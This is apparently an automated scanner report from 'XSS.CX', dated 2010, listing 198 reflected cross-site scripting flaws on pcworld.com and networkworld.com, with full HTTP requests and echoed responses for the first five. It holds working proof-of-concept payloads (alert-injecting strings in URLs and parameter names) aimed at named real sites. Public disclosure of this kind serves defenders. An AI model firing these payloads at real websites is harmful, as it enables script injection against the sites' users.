Report generated by XSS.CX at Mon Nov 15 18:11:43 CST 2010.


Cross Site Scripting Report, pcworld.com #2

1. Cross-site scripting (reflected)

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

1.1. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.pcworld.com/appguide/index.html [REST URL parameter 2]

1.3. http://www.pcworld.com/appguide/index.html [REST URL parameter 2]

1.4. http://www.pcworld.com/appguide/index.html [name of an arbitrarily supplied request parameter]

1.5. http://www.pcworld.com/article/192499/printer_buying_guide_shopping_smart.html [REST URL parameter 3]

1.6. http://www.pcworld.com/article/200323/microsoft_kin_a_not_so_fond_farewell.html [REST URL parameter 3]

1.7. http://www.pcworld.com/article/202806/11_mobile_web_annoyances_and_how_to_fix_them.html [REST URL parameter 3]

1.8. http://www.pcworld.com/article/210473/eliminate_duplicate_files_with_free_utility.html [REST URL parameter 3]

1.9. http://www.pcworld.com/article/210480/2010/11/iphone_annoyances.html [REST URL parameter 3]

1.10. http://www.pcworld.com/article/210480/2010/11/iphone_annoyances.html [REST URL parameter 4]

1.11. http://www.pcworld.com/article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html [REST URL parameter 3]

1.12. http://www.pcworld.com/blogs/id,56/today_pcworld.html [REST URL parameter 2]

1.13. http://www.pcworld.com/blogs/id,56/today_pcworld.html [REST URL parameter 3]

1.14. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 2]

1.15. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 3]

1.16. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 4]

1.17. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [name of an arbitrarily supplied request parameter]

1.18. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a parameter]

1.19. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 parameter]

1.20. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 2]

1.21. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 3]

1.22. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [REST URL parameter 4]

1.23. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [name of an arbitrarily supplied request parameter]

1.24. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e [rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday parameter]

1.25. http://www.pcworld.com/blogs/id,57/game_on.html [REST URL parameter 2]

1.26. http://www.pcworld.com/blogs/id,57/game_on.html [REST URL parameter 3]

1.27. http://www.pcworld.com/blogs/id,61/bizfeed.html [REST URL parameter 2]

1.28. http://www.pcworld.com/blogs/id,61/bizfeed.html [REST URL parameter 3]

1.29. http://www.pcworld.com/blogs/id,62/geek_tech.html [REST URL parameter 2]

1.30. http://www.pcworld.com/blogs/id,62/geek_tech.html [REST URL parameter 3]

1.31. http://www.pcworld.com/blogs/id,66/linux_line.html [REST URL parameter 2]

1.32. http://www.pcworld.com/blogs/id,66/linux_line.html [REST URL parameter 3]

1.33. http://www.pcworld.com/blogs/id,67/net_work.html [REST URL parameter 2]

1.34. http://www.pcworld.com/blogs/id,67/net_work.html [REST URL parameter 3]

1.35. http://www.pcworld.com/blogs/id,71/daily_deals.html [REST URL parameter 2]

1.36. http://www.pcworld.com/blogs/id,71/daily_deals.html [REST URL parameter 3]

1.37. http://www.pcworld.com/blogs/id,72/pcworld_podcast.html [REST URL parameter 2]

1.38. http://www.pcworld.com/blogs/id,72/pcworld_podcast.html [REST URL parameter 3]

1.39. http://www.pcworld.com/browse.html [REST URL parameter 1]

1.40. http://www.pcworld.com/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html [REST URL parameter 4]

1.41. http://www.pcworld.com/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html [REST URL parameter 4]

1.42. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 3]

1.43. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 3]

1.44. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 4]

1.45. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 4]

1.46. http://www.pcworld.com/businesscenter/index/office_hardware.html [REST URL parameter 3]

1.47. http://www.pcworld.com/businesscenter/index/office_hardware.html [REST URL parameter 3]

1.48. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 3]

1.49. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 3]

1.50. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 4]

1.51. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 4]

1.52. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 3]

1.53. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 3]

1.54. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 4]

1.55. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 4]

1.56. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 3]

1.57. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 3]

1.58. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 4]

1.59. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 4]

1.60. http://www.pcworld.com/businesscenter/index/security.html [REST URL parameter 3]

1.61. http://www.pcworld.com/businesscenter/index/security.html [REST URL parameter 3]

1.62. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 3]

1.63. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 3]

1.64. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 4]

1.65. http://www.pcworld.com/businesscenter/index/security/viruses_phishing_spam.html [REST URL parameter 4]

1.66. http://www.pcworld.com/businesscenter/index/servers_storage.html [REST URL parameter 3]

1.67. http://www.pcworld.com/businesscenter/index/servers_storage.html [REST URL parameter 3]

1.68. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 3]

1.69. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 3]

1.70. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 4]

1.71. http://www.pcworld.com/businesscenter/index/servers_storage/servers.html [REST URL parameter 4]

1.72. http://www.pcworld.com/businesscenter/index/software_services.html [REST URL parameter 3]

1.73. http://www.pcworld.com/businesscenter/index/software_services.html [REST URL parameter 3]

1.74. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 3]

1.75. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 3]

1.76. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 4]

1.77. http://www.pcworld.com/businesscenter/index/software_services/productivity.html [REST URL parameter 4]

1.78. http://www.pcworld.com/howto.html [REST URL parameter 1]

1.79. http://www.pcworld.com/news.html [REST URL parameter 1]

1.80. http://www.pcworld.com/newsletters/index [REST URL parameter 2]

1.81. http://www.pcworld.com/register [REST URL parameter 1]

1.82. http://www.pcworld.com/resource/circ_subservices.html [REST URL parameter 2]

1.83. http://www.pcworld.com/resource/community.html [REST URL parameter 2]

1.84. http://www.pcworld.com/resource/contactus.html [REST URL parameter 2]

1.85. http://www.pcworld.com/resource/idg_intl.html [REST URL parameter 2]

1.86. http://www.pcworld.com/resource/privacy.html [REST URL parameter 2]

1.87. http://www.pcworld.com/resource/rss.html [REST URL parameter 2]

1.88. http://www.pcworld.com/resource/site_faq.html [REST URL parameter 2]

1.89. http://www.pcworld.com/resource/termsofservice.html [REST URL parameter 2]

1.90. http://www.pcworld.com/reviews.html [REST URL parameter 1]

1.91. http://www.pcworld.com/reviews/collection/1597/free_antivirus_software.html [REST URL parameter 4]

1.92. http://www.pcworld.com/reviews/collection/1600/top_hd_pocket_camcorders.html [REST URL parameter 4]

1.93. http://www.pcworld.com/reviews/collection/1602/top_10_digital_slr_cameras.html [REST URL parameter 4]

1.94. http://www.pcworld.com/reviews/collection/1603/top_10_point_and_shoot_cameras.html [REST URL parameter 4]

1.95. http://www.pcworld.com/reviews/collection/1645/top_10_power_desktop_pcs.html [REST URL parameter 4]

1.96. http://www.pcworld.com/reviews/collection/1646/top_10_value_desktop_pcs.html [REST URL parameter 4]

1.97. http://www.pcworld.com/reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html [REST URL parameter 4]

1.98. http://www.pcworld.com/reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.html [REST URL parameter 4]

1.99. http://www.pcworld.com/reviews/collection/1649/top_5_gps_devices.html [REST URL parameter 4]

1.100. http://www.pcworld.com/reviews/collection/1650/top_10_external_hard_drives.html [REST URL parameter 4]

1.101. http://www.pcworld.com/reviews/collection/1651/top_10_network_attached_storage_devices.html [REST URL parameter 4]

1.102. http://www.pcworld.com/reviews/collection/1651/top_10_network_attached_storage_devices.html [REST URL parameter 4]

1.103. http://www.pcworld.com/reviews/collection/1652/top_5_internal_hard_drives.html [REST URL parameter 4]

1.104. http://www.pcworld.com/reviews/collection/1653/top_42_inch_hdtvs.html [REST URL parameter 4]

1.105. http://www.pcworld.com/reviews/collection/1654/top_5_46_and_47inch_hdtvs.html [REST URL parameter 4]

1.106. http://www.pcworld.com/reviews/collection/1655/top_big_hdtvs.html [REST URL parameter 4]

1.107. http://www.pcworld.com/reviews/collection/1656/top_bluray_disc_players.html [REST URL parameter 4]

1.108. http://www.pcworld.com/reviews/collection/1657/top_10_allpurpose_laptops.html [REST URL parameter 4]

1.109. http://www.pcworld.com/reviews/collection/1658/top_10_netbooks.html [REST URL parameter 4]

1.110. http://www.pcworld.com/reviews/collection/1659/top_10_power_laptops.html [REST URL parameter 4]

1.111. http://www.pcworld.com/reviews/collection/1660/top_10_ultraportable_laptops.html [REST URL parameter 4]

1.112. http://www.pcworld.com/reviews/collection/1663/top_10_mp3_players_flashbased.html [REST URL parameter 4]

1.113. http://www.pcworld.com/reviews/collection/1664/top_5_inkjet_printers.html [REST URL parameter 4]

1.114. http://www.pcworld.com/reviews/collection/1665/top_encrypted_portable_drives.html [REST URL parameter 4]

1.115. http://www.pcworld.com/reviews/collection/1665/top_encrypted_portable_drives.html [REST URL parameter 4]

1.116. http://www.pcworld.com/reviews/collection/1666/best_streaming_media_players.html [REST URL parameter 4]

1.117. http://www.pcworld.com/reviews/collection/1668/top_bluetooth_car_kits.html [REST URL parameter 4]

1.118. http://www.pcworld.com/reviews/collection/1669/webbased_photo_editors.html [REST URL parameter 4]

1.119. http://www.pcworld.com/reviews/collection/1670/top_10_bluetooth_headsets.html [REST URL parameter 4]

1.120. http://www.pcworld.com/reviews/collection/1671/top_10_cell_phones.html [REST URL parameter 4]

1.121. http://www.pcworld.com/reviews/collection/1672/top_10_unlocked_cell_phones.html [REST URL parameter 4]

1.122. http://www.pcworld.com/reviews/collection/1673/top_10_color_laser_multifunction_printers.html [REST URL parameter 4]

1.123. http://www.pcworld.com/reviews/collection/1674/top_10_color_laser_printers.html [REST URL parameter 4]

1.124. http://www.pcworld.com/reviews/collection/1674/top_10_color_laser_printers.html [REST URL parameter 4]

1.125. http://www.pcworld.com/reviews/collection/1675/top_10_inkjet_multifunction_printers.html [REST URL parameter 4]

1.126. http://www.pcworld.com/reviews/collection/1676/top_10_monochrome_laser_printers.html [REST URL parameter 4]

1.127. http://www.pcworld.com/reviews/collection/1676/top_10_monochrome_laser_printers.html [REST URL parameter 4]

1.128. http://www.pcworld.com/reviews/collection/1677/top_5_snapshot_printers.html [REST URL parameter 4]

1.129. http://www.pcworld.com/reviews/collection/1678/top_stereo_bluetooth_headsets.html [REST URL parameter 4]

1.130. http://www.pcworld.com/reviews/collection/1680/top_5_solidstate_drives.html [REST URL parameter 4]

1.131. http://www.pcworld.com/reviews/collection/1681/top_sync_services.html [REST URL parameter 4]

1.132. http://www.pcworld.com/reviews/collection/1683/top_hd_camcorders.html [REST URL parameter 4]

1.133. http://www.pcworld.com/reviews/collection/1685/top_rated_megazoom_cameras.html [REST URL parameter 4]

1.134. http://www.pcworld.com/reviews/collection/1705/top_pocket_megazooms.html [REST URL parameter 4]

1.135. http://www.pcworld.com/reviews/collection/1985/.html [REST URL parameter 4]

1.136. http://www.pcworld.com/reviews/collection/3146/top_mainstream_pcs.html [REST URL parameter 4]

1.137. http://www.pcworld.com/reviews/product/299836/review/lexmark_platinum_pro905.html [REST URL parameter 4]

1.138. http://www.pcworld.com/reviews/product/299836/review/lexmark_platinum_pro905.html [REST URL parameter 5]

1.139. http://www.pcworld.com/reviews/product/412265/review/canon_pixma_mx870.html [REST URL parameter 4]

1.140. http://www.pcworld.com/reviews/product/412265/review/canon_pixma_mx870.html [REST URL parameter 5]

1.141. http://www.pcworld.com/reviews/product/418937/review/lenovo_thinkpad_w701ds.html [REST URL parameter 4]

1.142. http://www.pcworld.com/reviews/product/418937/review/lenovo_thinkpad_w701ds.html [REST URL parameter 5]

1.143. http://www.pcworld.com/reviews/product/464683/review/lexmark_pinnacle_pro901.html [REST URL parameter 4]

1.144. http://www.pcworld.com/reviews/product/464683/review/lexmark_pinnacle_pro901.html [REST URL parameter 5]

1.145. http://www.pcworld.com/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html [REST URL parameter 4]

1.146. http://www.pcworld.com/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html [REST URL parameter 5]

1.147. http://www.pcworld.com/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html [REST URL parameter 4]

1.148. http://www.pcworld.com/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html [REST URL parameter 5]

1.149. http://www.pcworld.com/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html [REST URL parameter 4]

1.150. http://www.pcworld.com/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html [REST URL parameter 5]

1.151. http://www.pcworld.com/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html [REST URL parameter 4]

1.152. http://www.pcworld.com/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html [REST URL parameter 5]

1.153. http://www.pcworld.com/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html [REST URL parameter 4]

1.154. http://www.pcworld.com/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html [REST URL parameter 5]

1.155. http://www.pcworld.com/reviews/product/604358/review/hp_envy_17.html [REST URL parameter 4]

1.156. http://www.pcworld.com/reviews/product/604358/review/hp_envy_17.html [REST URL parameter 5]

1.157. http://www.pcworld.com/reviews/product/644407/review/canon_pixma_mg8120.html [REST URL parameter 4]

1.158. http://www.pcworld.com/reviews/product/644407/review/canon_pixma_mg8120.html [REST URL parameter 5]

1.159. http://www.pcworld.com/reviews/product/655414/review/epson_artisan_835.html [REST URL parameter 4]

1.160. http://www.pcworld.com/reviews/product/655414/review/epson_artisan_835.html [REST URL parameter 5]

1.161. http://www.pcworld.com/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html [REST URL parameter 4]

1.162. http://www.pcworld.com/reviews/product/664603/review/mitsubishi_unisen_lt46265_46inch_lcd_tv.html [REST URL parameter 5]

1.163. http://www.pcworld.com/shopping/ [REST URL parameter 1]

1.164. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 1]

1.165. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 1]

1.166. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 2]

1.167. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 2]

1.168. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 3]

1.169. http://www.pcworld.com/shopping/browse/category.html [REST URL parameter 3]

1.170. http://www.pcworld.com/shopping/browse/category.html [filter parameter]

1.171. http://www.pcworld.com/shopping/browse/category.html [filter parameter]

1.172. http://www.pcworld.com/shopping/browse/category.html [name of an arbitrarily supplied request parameter]

1.173. http://www.pcworld.com/shopping/browse/category.html [name of an arbitrarily supplied request parameter]

1.174. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 1]

1.175. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 2]

1.176. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 2]

1.177. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 3]

1.178. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 3]

1.179. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 4]

1.180. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 1]

1.181. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 2]

1.182. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 2]

1.183. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 3]

1.184. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 3]

1.185. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 4]

1.186. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 1]

1.187. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 2]

1.188. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 2]

1.189. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 3]

1.190. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 3]

1.191. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 4]

1.192. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 1]

1.193. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 2]

1.194. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 2]

1.195. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 3]

1.196. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 3]

1.197. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 4]

1.198. http://www.networkworld.com/ [Referer HTTP header]



1. Cross-site scripting (reflected)
There are 198 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36889'-alert(1)-'9d6d99564c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?36889'-alert(1)-'9d6d99564c8=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Mon, 15 Nov 2010 22:10:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:10:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1289859005541747; path=/; expires=Wed, 14-Nov-12 22:10:05 GMT
Content-Length: 208735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
gtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: 'Network World',
request_uri: '/?36889'-alert(1)-'9d6d99564c8=1',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''    
};
}();
var jq_nodeid = "";
var jq_request_uri = "/?36889'-alert(1)-'9d
...[SNIP]...

1.2. http://www.pcworld.com/appguide/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /appguide/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94802'-alert(1)-'7e00f0a2a5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appguide/index.html94802'-alert(1)-'7e00f0a2a5a HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=68646115D5E127D4D6963C96CE4ADD41; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:31:08 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...

   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/appguide/index.html94802'-alert(1)-'7e00f0a2a5a';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.3. http://www.pcworld.com/appguide/index.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /appguide/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6d9c"><a>79298ac7cb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /appguide/index.htmld6d9c"><a>79298ac7cb4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:28:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<a href="/appguide/index.htmld6d9c"><a>79298ac7cb4?&page=2">
...[SNIP]...

1.4. http://www.pcworld.com/appguide/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /appguide/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ccdb"><script>alert(1)</script>fde03ea319 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appguide/index.html?6ccdb"><script>alert(1)</script>fde03ea319=1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:26:15 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=80B198B1F519DDAD4D2F1832CE9CE382; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:26:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<a href="/appguide/index.html?6ccdb"><script>alert(1)</script>fde03ea319=1&page=2">
...[SNIP]...

1.5. http://www.pcworld.com/article/192499/printer_buying_guide_shopping_smart.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/192499/printer_buying_guide_shopping_smart.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c921'-alert(1)-'6b04ed13bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/192499/printer_buying_guide_shopping_smart.html2c921'-alert(1)-'6b04ed13bb7?tk=fv_rel HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
